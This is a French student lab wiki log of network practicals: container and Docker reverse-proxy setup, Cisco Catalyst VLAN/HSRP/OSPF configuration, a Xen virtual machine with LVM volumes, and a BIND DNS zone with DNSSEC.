&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
 xl create Dionysos.cfg&lt;br /&gt;
 xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/ssh/sshd_config nous décommentons la ligne : &lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Ainsi nous pouvons nous connecter en ssh sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
 ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
 xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.space &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
